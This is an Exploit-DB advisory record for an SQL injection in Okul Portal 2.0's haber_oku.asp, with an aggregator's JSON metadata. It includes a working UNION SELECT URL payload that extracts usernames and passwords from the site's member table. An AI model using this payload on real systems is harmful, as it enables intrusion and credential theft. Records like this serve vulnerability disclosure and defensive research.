Ibrahim Ã?AKICI Okul Portal Haber_Oku.ASP - SQL Injection Vulnerability
2007-06-08T00:00:00
ID EDB-ID:30165 Type exploitdb Reporter ertuqrul Modified 2007-06-08T00:00:00
Description
Ibrahim Ã?AKICI Okul Portal 2.0 Haber_Oku.ASP SQL Injection Vulnerability. Webapps exploit for asp platform
source: http://www.securityfocus.com/bid/24379/info
Ibrahim Ă?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
Ibrahim Ă?AKICI Okul Portal 2.0 is vulnerable to this issue.
http://www.example.com/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler
{"id": "EDB-ID:30165", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Ibrahim \u00c3?AKICI Okul Portal Haber_Oku.ASP - SQL Injection Vulnerability", "description": "Ibrahim \u00c3?AKICI Okul Portal 2.0 Haber_Oku.ASP SQL Injection Vulnerability. Webapps exploit for asp platform", "published": "2007-06-08T00:00:00", "modified": "2007-06-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/30165/", "reporter": "ertuqrul", "references": [], "cvelist": [], "lastseen": "2016-02-03T11:53:33", "viewCount": 2, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2016-02-03T11:53:33", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-03T11:53:33", "rev": 2}, "vulnersScore": 0.7}, "sourceHref": "https://www.exploit-db.com/download/30165/", "sourceData": "source: http://www.securityfocus.com/bid/24379/info\r\n\r\nIbrahim \u0102\u0083?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.\r\n\r\nAn attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.\r\n\r\nIbrahim \u0102\u0083?AKICI Okul Portal 2.0 is vulnerable to this issue. \r\n\r\nhttp://www.example.com/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler ", "osvdbidlist": []}